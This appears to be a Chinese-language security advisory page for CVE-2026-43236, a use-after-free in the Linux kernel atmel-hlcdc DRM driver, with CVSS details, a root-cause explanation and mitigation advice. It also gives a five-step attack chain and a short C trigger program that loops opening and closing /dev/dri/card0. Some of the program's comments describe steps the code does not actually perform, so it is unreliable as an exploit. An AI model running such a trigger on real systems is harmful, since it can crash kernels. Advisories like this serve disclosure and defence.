CVE-2026-43236 CVSS 7.8 高危

CVE-2026-43236 Linux内核drm/atmel-hlcdc释放后使用漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43236

漏洞类型

释放后使用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的DRM子系统中的atmel-hlcdc驱动程序存在一个释放后使用（UAF）漏洞。该漏洞源于`atmel_hlcdc_plane_atomic_duplicate_state`函数在复制平面状态时未正确克隆基础`drm_plane_state`结构，导致`commit`指针悬空。当在fbdev等客户端连接时进行设备节点的关闭和重开操作，会触发该漏洞，可能导致内核崩溃或权限提升。

技术细节

该漏洞发生在Linux内核的图形驱动部分。Atmel HLCDC驱动在实现`atomic_duplicate_state`回调时存在缺陷。具体来说，它手动复制了自定义的`atmel_hlcdc_plane`状态，但未能调用`__drm_atomic_helper_duplicate_plane_state`来初始化通用的`drm_plane_state`。这导致新状态对象中的`commit`字段仍然指向已经被释放的旧提交对象的内存地址。当系统执行后续的原子提交操作（`drm_atomic_commit`）时，会尝试访问这个已经无效的指针。由于该内存区域可能已被内核分配器回收并用于其他对象（如日志中的kmalloc-64），访问会导致内核写入错误的内存位置，触发“Poison overwritten”错误，进而导致内核恐慌。攻击者可利用此漏洞造成拒绝服务或潜在的内核代码执行。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地低权限访问权限。

STEP 2

步骤2

确认目标系统运行受影响版本的Linux内核并启用了atmel-hlcdc驱动。

STEP 3

步骤3

攻击者执行恶意程序，反复打开和关闭DRM设备节点（如/dev/dri/card0）。

STEP 4

步骤4

在系统其他DRM客户端（如fbdev）活跃期间，触发原子提交操作，导致`drm_plane_state`中的`commit`指针指向已释放内存。

STEP 5

步骤5

系统访问悬空指针，触发内核错误（Poison overwritten），导致内核崩溃（DoS）或潜在的权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Trigger Logic for CVE-2026-43236
 * This snippet demonstrates the logic to trigger the UAF.
 * It requires a system with the vulnerable atmel-hlcdc driver.
 */

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define DRM_DEVICE "/dev/dri/card0"

int main() {
    int fd;
    int i;

    printf("[*] Starting PoC for CVE-2026-43236...\n");

    // Loop to increase the chance of hitting the race condition
    for (i = 0; i < 100; i++) {
        // Step 1: Open the DRM device node
        fd = open(DRM_DEVICE, O_RDWR);
        if (fd < 0) {
            perror("Failed to open device");
            continue;
        }

        // Step 2: Simulate the scenario where fbdev is attached
        // (Usually happens automatically on boot for consoles)
        // We perform operations that might trigger atomic commits

        // Step 3: Close the device node abruptly while operations might be pending
        // This triggers the cleanup path where the use-after-free occurs
        // if another client (like fbdev) is holding a reference.
        close(fd);

        // Re-opening immediately to trigger the duplicate_state logic with stale pointers
        fd = open(DRM_DEVICE, O_RDWR);
        if (fd >= 0) {
            close(fd);
        }
    }

    printf("[*] Exploit trigger sequence completed.\n");
    return 0;
}

影响范围

Linux Kernel（特定受影响版本请参考Git提交记录：549c6db, 6404898, 796e77c, 7b4d0fa, a205740）

防御指南

临时缓解措施

建议用户及时更新操作系统内核至最新版本。在未更新前，应严格限制本地用户对图形设备文件的访问权限，避免不可信用户登录系统，并禁用不必要的Atmel HLCDC驱动模块。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表